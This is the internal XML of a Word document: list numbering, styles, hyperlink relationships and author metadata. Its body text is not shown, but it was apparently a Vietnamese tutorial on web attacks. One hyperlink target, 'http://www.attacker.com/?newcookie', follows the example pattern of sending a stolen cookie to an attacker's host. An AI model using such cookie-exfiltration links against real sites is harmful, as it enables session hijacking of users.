    <w:lvl w:ilvl="0" w:tplc="03E0F28E">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="741" w:hanging="353"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:eastAsia="Symbol" w:hAnsi="Symbol" w:cs="Symbol" w:hint="default"/>
        <w:w w:val="102"/>
        <w:sz w:val="25"/>
        <w:szCs w:val="25"/>
        <w:lang w:val="vi" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="C4BCF35A">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1652" w:hanging="353"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="vi" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="50B21A54">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2564" w:hanging="353"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="vi" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="7FF8DF6E">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3476" w:hanging="353"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="vi" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="386861D4">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4388" w:hanging="353"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="vi" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="6AD4CE10">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5300" w:hanging="353"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="vi" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="BD308DBC">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6212" w:hanging="353"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="vi" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="F7F417C8">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7124" w:hanging="353"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="vi" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="AFD055DC">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8036" w:hanging="353"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="vi" w:eastAsia="en-US" w:bidi="ar-SA"/>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C8"/>
    <w:rsid w:val="00017D29"/>
    <w:rsid w:val="00107BF3"/>
    <w:rsid w:val="00221579"/>
    <w:rsid w:val="00233B56"/>
    <w:rsid w:val="002A4E11"/>
    <w:rsid w:val="002F0CA8"/>
    <w:rsid w:val="003A262D"/>
    <w:rsid w:val="003A61ED"/>
    <w:rsid w:val="00407983"/>
    <w:rsid w:val="004F67C8"/>
    <w:rsid w:val="005A57B4"/>
    <w:rsid w:val="005C5B18"/>
    <w:rsid w:val="005E1B43"/>
    <w:rsid w:val="006B3B79"/>
    <w:rsid w:val="007C1F99"/>
    <w:rsid w:val="008872A1"/>
    <w:rsid w:val="008F4DA7"/>
    <w:rsid w:val="00903C21"/>
    <w:rsid w:val="0096149B"/>
    <w:rsid w:val="00A80D11"/>
    <w:rsid w:val="00BD7C68"/>
    <w:rsid w:val="00D9523B"/>
    <w:rsid w:val="00DA0BCA"/>
    <w:rsid w:val="00E42092"/>
    <w:rsid w:val="00EC7A6B"/>
    <w:rsid w:val="00F54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217C5"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{82562506-CDE8-4AA7-8A89-0F3F6912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B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07983"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Caption">
    <w:name w:val="caption"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="35"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="008F4DA7"/>
    <w:pPr>
      <w:spacing w:after="200" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="44546A" w:themeColor="text2"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BodyText">
    <w:name w:val="Body Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BodyTextChar"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="008F4DA7"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="25"/>
      <w:szCs w:val="25"/>
      <w:lang w:val="vi"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="BodyTextChar">
    <w:name w:val="Body Text Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="BodyText"/>
    <w:uiPriority w:val="1"/>
    <w:rsid w:val="008F4DA7"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="25"/>
      <w:szCs w:val="25"/>
      <w:lang w:val="vi"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="002F0CA8"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="002F0CA8"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00961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49B"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00961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9B"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading1Char">
    <w:name w:val="Heading 1 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="005E1B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1B43"/>
    <w:pPr>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC1">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="005E1B43"/>
    <w:pPr>
      <w:spacing w:after="100"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="005E1B43"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="220"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC3">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="005E1B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redhat.com" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.emf"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.attacker.com/?newcookie"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www.attacker.com/?newcooki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lienket.a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tentrangweb.com/advadmin" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.yahoo.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lienket.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yahoo.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93D0-5967-4FD1-8CD8-D73457D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5390</Words>
  <Characters>3072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rần Quốc</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Nam Trần Quốc</cp:lastModifiedBy>
  <cp:revision>9</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-12-23T06:01:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-12-23T09:49:00Z</dcterms:modified>
</cp:coreProperties>
</file>